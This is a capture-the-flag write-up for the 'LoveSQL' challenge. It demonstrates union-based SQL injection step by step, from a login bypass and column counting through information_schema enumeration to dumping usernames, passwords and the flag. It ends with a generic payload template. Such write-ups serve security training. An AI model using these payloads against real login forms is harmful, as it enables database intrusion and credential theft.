[BUUCTF] [Geek Challenge 2019] LoveSQL
1. SQL injection test site
Basic knowledge points
union 联合查询
information表
group_concat()
Injection process
1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
5.爆数据库
6.爆数据库的表
7.爆出表的列
8.爆出flag
2. Problem solving process
0. There is SQL injection
Add single quotes to report an error
/check.php?username=1'&password=2
/check.php?username=1&password=2'
/check.php?username=1'&password=2'
1. Universal password admin' or 1=1
Or
1'or 1=1 #
账号
admin' or 1=1 #
密码
1
admin
47cb230740bc6725fd194aec8e479fc4
Tips: Enter the # in the box, directly use the hackbar address bar, you need to URL encode the #, that is, replace it with %23
2. Burst Field
check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1
check.php?username=admin ' order by 4 %23&password=1
Change to 4, report an error, there are 3 fields
Unknown column '4' in 'order clause'
3. Look at the echo
/check.php?username=1' union select 1,2,3%23&password=1
The echo point is at 2, 3
4. Blast the database
check.php?username=1' union select 1,database(),version()%23&password=1
Database name: geek
version: 10.3.18-MariaDB
5. Burst database tables
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
The database table names are:
geekuser
l0ve1ysq1
According to the title, the table name should be l0ve1ysq1
6. Burst out the columns of the table
/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'
%23&password=1
/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'
%23&password=1
7. Read the content, explode the flag
geekuser table
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
Change a
l0ve1ysq1 table
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{1cbf436f-3991-4300-9042-4f6c5f9e950f}'
Your password is 'cl4y@@wo_tai_nan_le,glzjin@@glzjin_wants_a_girlfriend,Z4cHAr7zCr@@biao_ge_dddd_hm,0xC4m3l@@linux_chuang_shi_ren,Ayrain@@a_rua_rain,Akko@@yan_shi_fu_de_mao_bo_he,fouc5@@cl4y,fouc5@@di_2_kuai_fu_ji,fouc5@@di_3_kuai_fu_ji,fouc5@@di_4_kuai_fu_ji,fouc5@@di_5_kuai_fu_ji,fouc5@@di_6_kuai_fu_ji,fouc5@@di_7_kuai_fu_ji,fouc5@@di_8_kuai_fu_ji,leixiao@@Syc_san_da_hacker,flag@@flag{2c52a50a-072c-4e80-aa81-3be3eddf604f}'
flag{1cbf436f-3991-4300-9042-4f6c5f9e950f}
Three, refining summary
Burst field
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 1 %23
1' order by 2 %23
1' order by 3 %23
See echo
1' union select 1,2,3 #
Burst database
1' union select 1,database(),version() #
DATABASE,VERSION
Burst database table
There is only one database, which saves trouble and is directly equal
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
Multiple databases, select one
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'
AAA,BBB,CCC
Burst table column
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
Read content, burst flag
Read AAA table
1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1
ASCII code can be added for easy distinction
1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1